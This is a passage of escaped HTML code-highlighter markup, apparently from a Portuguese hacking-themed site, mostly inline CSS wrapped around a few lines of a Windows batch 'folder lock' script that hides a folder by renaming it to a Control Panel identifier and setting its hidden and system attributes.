style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if %cho%==N goto END&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;14.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;echo Invalid choice.&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;15.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;goto CONFIRM&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;16.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;:LOCK&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;17.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;18.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 